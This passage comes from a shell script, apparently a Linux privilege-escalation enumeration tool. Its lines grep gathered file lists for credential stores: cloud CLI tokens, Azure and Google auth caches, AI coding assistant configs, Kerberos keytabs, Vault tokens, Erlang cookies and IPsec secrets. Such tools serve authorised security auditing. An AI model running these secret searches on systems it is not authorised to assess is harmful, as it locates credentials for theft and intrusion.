"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "credentials\.db$|legacy_credentials\.db$|adc\.json$|\.boto$|\.credentials\.json$|firebase-tools\.json$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|gcloud$|legacy_credentials$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|clouds\.config$|service_principal_entries\.json$|msal_token_cache\.json$|msal_http_cache\.bin$|service_principal_entries\.bin$|msal_token_cache\.bin$|ErrorRecords$|TokenCache\.dat$|\.bluemix$|doctl$|Google Cloud Directory Sync$|Google Password Sync$" | sort | uniq | head -n 70) 842 PSTORAGE_AI_CODING_ASSISTANTS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '.*/\.config/gh$|.*/AppData/.*gh$|.*/Library/Application Support/gh$|.*/(Cursor|Code|Code - Insiders)/User/(globalStorage|workspaceStorage)(/.*)?$|.*/Library/Application Support/(Cursor|Code|Code - Insiders)/User/(globalStorage|workspaceStorage)(/.*)?$' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.codex$|\.claude$|\.claude\.json$|\.gemini$|\.cursor$|\.mcp\.json$|gh$|state\.vscdb$|state\.vscdb\.backup$|storage\.json$" | sort | uniq | head -n 70) 843 PSTORAGE_ROAD_RECON=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.roadtools_auth$" | sort | uniq | head -n 70) 844 PSTORAGE_FREEIPA=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "ipa$|dirsrv$" | sort | uniq | head -n 70) 845 PSTORAGE_KERBEROS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "krb5\.conf$|.*\.keytab$|\.k5login$|krb5cc_.*$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) 846 PSTORAGE_KIBANA=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) 847 PSTORAGE_GRAFANA=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "grafana\.ini$" | sort | uniq | head -n 70) 848 PSTORAGE_KNOCKD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '/etc/init.d/' | grep -E "^${ROOT_FOLDER}etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) 849 PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "logstash$" | sort | uniq | head -n 70) 850 PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) 851 PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) 852 PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.vault-token$" | sort | uniq | head -n 70) 853 PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "couchdb$" | sort | uniq | head -n 70) 854 PSTORAGE_REDIS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "redis\.conf$" | sort | uniq | head -n 70) 855 PSTORAGE_MOSQUITTO=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) 856 PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "neo4j$" | sort | uniq | head -n 70) 857 PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) 858 PSTORAGE_ERLANG=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) 859 PSTORAGE_SIP=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "sip\.conf$|amportal\.conf$|FreePBX\.conf$|Elastix\.conf$" | sort | uniq | head -n 70) 860 PSTORAGE_GMV_AUTH=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) 861 PSTORAGE_IPSEC=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) 862 PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.irssi$" | sort | uniq | head -n 70) 863 PSTORAGE_KEYRING=$(echo -e 